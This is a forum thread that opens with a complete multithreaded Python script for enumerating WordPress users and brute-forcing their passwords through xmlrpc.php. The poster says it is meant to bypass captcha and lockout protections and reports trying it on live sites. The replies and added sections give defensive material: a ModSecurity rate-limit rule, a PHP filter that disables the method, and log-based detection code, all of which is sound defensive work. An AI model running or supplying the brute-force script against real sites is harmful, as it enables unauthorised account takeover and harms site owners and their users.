dancezar

xmlrpc wordpress bruteforce



import urllib2
import Queue
import threading,sys

useri=[]
passwd=[]
url=""
work=0
stiva=Queue.Queue()
stiva_us=Queue.Queue()
def login(domain,user,passs):
    # One wp.getUsersBlogs call; the outcome is read from the response body
    xml_post="<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>"+str(user)+"</string></value></param><param><value><string>"+str(passs)+"</string></value></param></params></methodCall>"
    re=urllib2.Request(domain,xml_post)
    try:
        ur=urllib2.urlopen(re)
        html=ur.read()
        if "Incorrect username" in html:
            return 0
        elif "isAdmin" in html:
            return 1
        elif "requested method " in html:
            print "[+] Modulul wp.getUsersBlogs e blocat!"
            exit()
        else:
            print "[!] unknow response"
            exit()
    except urllib2.URLError,e:
        # HTTPError carries .code; a plain URLError only has .reason (the original called e.code(), which crashes)
        print "[!] Erroare HTTP "+str(getattr(e,"code",e.reason))
        exit()
def enum(j):
    # Worker: take an author id from the queue and read the user name out of the /author/<name>/ redirect
    global work,stiva,url,useri
    while work==1:
        try:
            i=stiva.get(False)
            try:
                r=urllib2.Request(url+"?author="+str(i))
                u=urllib2.urlopen(r)
                redirect=u.geturl()
                if "/author/" in redirect:
                    splited=redirect.split("/author/")
                    us=splited[1].replace("/","")
                    if us not in useri:
                        useri.append(us)
                        print us
            except urllib2.URLError,e:
                pass
            if stiva.empty():
                return 0
        except Queue.Empty:
            pass
        else:
            stiva.task_done()

def brute(j):
    # Worker: take (user,password) pairs from the queue until one logs in or the queue runs dry
    global stiva_us,url,work
    while work==1:
        try:
            creds=stiva_us.get(False)
            rez=login(url,creds[0],creds[1])
            print str(creds[0])+" "+str(creds[1])
            if rez==1:
                print "[+] Got him ^~^ :"+str(creds[0])+" "+str(creds[1])
                work=0
        except Queue.Empty:
            pass
        else:
            stiva_us.task_done()

url=sys.argv[1]
passwd=open(sys.argv[3]).read().splitlines()
th=[]
th_br=[]
work=1
for i in range(4):
    t=threading.Thread(target=enum,args=(1,))
    th.append(t)
    t.start()
for i in range(12):
    stiva.put(i)
for i in th:
    i.join()
if len(useri)>0:
    print "[+] Am terminat de enumerat useri:"+str(len(useri))
    print "[+] Incep bruteforce"
else:
    print "[-] Nu s-au gasit useri voi incerca cu lista de useri"
    users=open(sys.argv[2]).read().splitlines()
    for user in users:
        useri.append(user)
    print "[+] Incep bruteforce"
print "[+] Testez daca exista xmlrpc.php"
r=urllib2.Request(url+"/xmlrpc.php")
try:
    ur=urllib2.urlopen(r)
except urllib2.URLError,e:
    print "[!] "+str(getattr(e,"code",e.reason))+" xmlrpc nu exista!"
    exit()
work=1
url+="/xmlrpc.php"
for us in useri:
    for p in passwd:
        stiva_us.put((us,p))
for t in range(int(sys.argv[4])):
    thr=threading.Thread(target=brute,args=(1,))
    th_br.append(thr)
    thr.start()
for t_j in th_br:
    t_j.join()
print "[+] EXIT!"


I needed a bruteforcer for WordPress that gets past protections such as captcha or lockout after repeated attempts; I remembered an article that presented this concept and set about writing a bruteforcer in Python (I'm not very talented at Python, I only started 3 months ago). First it will try to enumerate users (this still needs work: it doesn't extract them from the title, only from the redirect), and then it will bruteforce.


python wp_brute.py site.com userlist.txt passlist.txt NR_THREADS

userlist.txt is needed when it fails to enumerate users.

I tried it on 2 sites where I already knew the password and on localhost, and it worked. :)

Edited by danyweb09
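The script above leaves a recognisable access-log footprint: a sweep of GET /?author=N requests answered with 301 redirects, followed by a burst of POSTs to xmlrpc.php from the same source. The following detection example is added here and is not part of the original post or the script: it parses combined-format access-log lines and raises one alert per source IP for each phase. The log lines, IP addresses, thresholds (5 distinct author ids, 20 POSTs within 60 s) and the window length are all constructed assumptions, not values taken from the page.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Combined log format (Apache/nginx), e.g.:
# 203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Python-urllib/2.7"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
AUTHOR_RE = re.compile(r'^/\?author=(\d+)$')


def parse_line(line):
    """Parse one combined-format access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {
        'ip': m.group('ip'),
        'ts': datetime.strptime(m.group('ts'), '%d/%b/%Y:%H:%M:%S %z'),
        'method': m.group('method'),
        'path': m.group('path'),
        'status': int(m.group('status')),
        'ua': m.group('ua'),
    }


def detect(lines, window_s=60, author_threshold=5, xmlrpc_threshold=20):
    """Return (ip, kind, ts) alerts for the two phases of the scanner:
    'author_enum'  when one IP probes >= author_threshold distinct ?author=N ids,
    'xmlrpc_burst' when one IP POSTs to xmlrpc.php >= xmlrpc_threshold times within window_s seconds.
    Each (ip, kind) pair is reported once, at the request that crossed the threshold."""
    author_ids = defaultdict(set)       # ip -> distinct author ids probed so far
    xmlrpc_times = defaultdict(deque)   # ip -> timestamps of POST xmlrpc.php inside the sliding window
    alerts, flagged = [], set()

    def fire(ip, kind, ts):
        if (ip, kind) not in flagged:
            flagged.add((ip, kind))
            alerts.append((ip, kind, ts))

    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue                      # unparseable line: skip rather than crash
        ip, ts = ev['ip'], ev['ts']
        m = AUTHOR_RE.match(ev['path'])
        if ev['method'] == 'GET' and m:
            author_ids[ip].add(int(m.group(1)))
            if len(author_ids[ip]) >= author_threshold:
                fire(ip, 'author_enum', ts)
        elif ev['method'] == 'POST' and ev['path'].split('?')[0].endswith('/xmlrpc.php'):
            q = xmlrpc_times[ip]
            q.append(ts)
            while q and (ts - q[0]) > timedelta(seconds=window_s):
                q.popleft()               # drop hits that fell out of the window
            if len(q) >= xmlrpc_threshold:
                fire(ip, 'xmlrpc_burst', ts)
    return alerts


def _log_line(ip, ts, method, path, status, ua):
    """Build one constructed log line in combined format (sample data, not real traffic)."""
    return '%s - - [%s +0000] "%s %s HTTP/1.1" %d 0 "-" "%s"' % (
        ip, ts.strftime('%d/%b/%Y:%H:%M:%S'), method, path, status, ua)


def sample_log():
    """Constructed traffic: one host sweeps ?author=1..6 and then sends 25 POSTs to xmlrpc.php
    at one per second; a second host makes three widely spaced XML-RPC calls and one page view."""
    t0 = datetime(2023, 10, 10, 13, 55, 0, tzinfo=timezone.utc)
    scanner, legit = '203.0.113.7', '198.51.100.4'
    lines = []
    for i in range(1, 7):
        lines.append(_log_line(scanner, t0 + timedelta(seconds=i), 'GET', '/?author=%d' % i, 301, 'Python-urllib/2.7'))
    for i in range(25):
        lines.append(_log_line(scanner, t0 + timedelta(seconds=10 + i), 'POST', '/xmlrpc.php', 200, 'Python-urllib/2.7'))
    for i in range(3):
        lines.append(_log_line(legit, t0 + timedelta(minutes=i), 'POST', '/xmlrpc.php', 200, 'Jetpack by WordPress.com'))
    lines.append(_log_line(legit, t0 + timedelta(minutes=5), 'GET', '/about/', 200, 'Mozilla/5.0'))
    return lines


if __name__ == '__main__':
    for ip, kind, ts in detect(sample_log()):
        print('%s %s first seen at %s' % (ip, kind, ts.isoformat()))
```

The second host never trips either detector: it probes no author ids and its three POSTs are a minute apart, so the sliding window never holds more than one of them. Thresholds should be tuned against a site's own baseline, since legitimate XML-RPC clients (mobile apps, pingbacks, Jetpack) do post to this endpoint.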

SecRule REQUEST_LINE "POST .*xmlrpc.*"
 "pass,initcol:ip=%{REMOTE_ADDR},setvar:ip.maxlimit=+1,deprecatevar:ip.maxlimit=1/600,nolog.....

etc.

oops :)

I understand that's a maximum of 600 POST requests to xmlrpc, which is about enough for a quick bruteforce; the only sure way to avoid this is:


<?php

add_filter( 'xmlrpc_methods', 'Remove_Unneeded_XMLRPC' );

function Remove_Unneeded_XMLRPC( $methods ) {
    unset( $methods['wp.getUsersBlogs'] );
    return $methods;
}

?>

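The rule quoted above counts each POST to xmlrpc against an ip.maxlimit variable and lets that counter decay by 1 every 600 seconds; the rule that actually acts on the counter is elided ("....."). The model below is an added example, not code from the post or from ModSecurity: it replays constructed traffic through a step-wise decaying counter with those semantics and reports when a source first exceeds a limit. The limit of 50, the IP addresses and the traffic pattern are assumptions made for the example; they show why a burst is stopped within seconds while a client pacing itself at the decay rate is never blocked.

```python
from collections import defaultdict


class DecayingCounter:
    """Per-source counter with the semantics of the ModSecurity pair
    setvar:ip.maxlimit=+1 / deprecatevar:ip.maxlimit=1/600 in the rule above:
    each matching request adds 1, and the value drops by `amount` once per full
    `period` seconds of elapsed time (step-wise, never below zero). Assumed model."""

    def __init__(self, amount=1, period=600):
        self.amount = amount
        self.period = period
        self.value = defaultdict(int)
        self.last_decay = {}            # ip -> time up to which decay has been applied

    def hit(self, ip, now):
        """Record one matching request from `ip` at time `now` (seconds); return the new value."""
        if ip not in self.last_decay:
            self.last_decay[ip] = now
        steps = int((now - self.last_decay[ip]) // self.period)
        if steps:
            self.value[ip] = max(0, self.value[ip] - self.amount * steps)
            self.last_decay[ip] += steps * self.period
        self.value[ip] += 1
        return self.value[ip]


def first_block_time(requests, limit, amount=1, period=600):
    """Replay (ip, time_s) POSTs to xmlrpc.php through the counter and return
    {ip: time at which the counter first exceeded `limit`}; sources that never
    exceed it are absent. `limit` stands in for the blocking rule elided in the
    post, so it is an assumption of this example."""
    counter = DecayingCounter(amount, period)
    blocked = {}
    for ip, t in requests:
        if ip in blocked:
            continue                    # already blocked; later requests would be denied
        if counter.hit(ip, t) > limit:
            blocked[ip] = t
    return blocked


def constructed_traffic():
    """Constructed sample: a brute forcer at 1 POST/s for two minutes, and a
    slow client sending one POST every 600 s (exactly the decay rate) for 24 hours."""
    fast = [('203.0.113.7', t) for t in range(120)]
    slow = [('198.51.100.4', t) for t in range(0, 24 * 3600, 600)]
    return sorted(fast + slow, key=lambda r: r[1])


if __name__ == '__main__':
    for ip, t in first_block_time(constructed_traffic(), limit=50).items():
        print('%s exceeded the limit after %d s' % (ip, t))
```

With a limit of 50 the fast source is blocked 50 seconds in, while the slow source's counter returns to zero before each new request and never climbs. Removing the method altogether, as the PHP filter above does, does not depend on any such threshold.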